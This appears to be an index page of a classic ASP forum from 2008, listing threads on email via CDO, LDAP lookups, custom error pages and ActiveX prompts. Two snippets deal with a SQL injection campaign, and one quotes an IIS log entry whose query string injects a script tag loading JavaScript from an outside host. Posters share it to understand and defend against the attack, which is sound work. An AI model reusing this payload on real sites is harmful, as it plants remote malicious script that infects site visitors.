First  |  Prev |  Next  |  Last
Pages: 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37
Validation on email address
Hi, Is there a way to validate an email address and to check whether it is sendable? Function EmailTo(ToEmail, FromEmail, strSubject, strBody) Set objMessage = CreateObject("CDO.Message") objMessage.Subject = strSubject objMessage.From = FromEmail objMessage.To = ToEmail objMessage.HTMLBody ... 18 Jun 2008 23:04
How the injection worked...
Here's an example of how it was originally injected into at least one web site and thus database: http://www.aspmessageboard.com/forum/showMessage.asp?F=21&M=894997&P=1#894984 The next post is my decoding of that and then Xander's post has a link to here: http://isc.sans.org/diary.html?n&storyid=4294 that e... 2 Jul 2008 14:59
SQL Injection
- - - - - - - - - IIS Log File Entry - - - - - - - - - - - - - - - - GET /sresult.asp title=(Your%20Love%20Keeps%20Lifting%20Me)%20Higher%20And%20Higher&artist=Michael%20McDonald&type=%25&category=%25&column=t_asc%3Cscript%20src= http://www.advabnr.com/b.js%3E%3C/script%3E 80 - 76.16.112.66 HTTP/1.1 - - - - - - - ... 5 Jul 2008 12:31
LDAP version of winnt://.../user ?
I'm porting some code over to use ADS for user data lookup, but can't find a clear reference anywhere to the old windows 2000 userid (the network login). Does it still exist within LDAP, or will I have to match to sn & givenName? ... 16 Jun 2008 12:10
PDA wireless
I have a Web application that is written in ASP. It runs well on regular PC. What is needed to make it run on PDA (wireless)? I want to buy a new PDA to test the application. Is there a particular brand of PDA or operating system that I should buy? Thanks. ... 23 Jun 2008 05:33
newbiie (ish) getting the client URL when using custome errors asp ?
Im sure this is dead simple but where do you find the URL causing the error ? I am trying to catch bad directory references using IIS custom errors tab It points to my error handler eg error404.asp however when that executes Request("URL") it shows the address of the error handler not the original address... 13 Jun 2008 23:32
CDO, ASP and Email Form Problems
How do I alter the follow asp code so the from field produces the a friendly address "Name <something(a)changeme.com>" Code is presently used. <% If Request.Form("btnSend").Count > 0 Then Set objMessage = CreateObject("CDO.Message") objMessage.Subject = Request.Form("subject") objMessage.Sender = ... 17 Jun 2008 02:59
a trappable error (c0000005)
Hi all, I am getting the following error randomly, I cannot expalin the exact scenario Active Server Pages error 'ASP 0115' Unexpected error /wmweb/Save.Asp A trappable error (C0000005) occurred in an external object. The script cannot continue running. Appreciated your help on this. The Code : <%@ Co... 11 Jun 2008 20:31
You are about to access a Activex component
Hi, We are trying to access a .net dll based method from classic asp code. When the method is accessed, system gives a message "You are about to access a Activex component". How do we suppress or stop this message from interfering method access. Any help is appreciated. SM ... 11 Jun 2008 07:11
ASP.NET web app works on some, not all, workstations
I have a client that has contracted with a bank to process checks over the Internet. The solution includes a check scanner and APS.NET web application. The application does not work for all workstations at the client site. There are two laptop computers than can run the web application and all it's functions... 11 Jun 2008 10:15
First  |  Prev |  Next  |  Last
Pages: 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37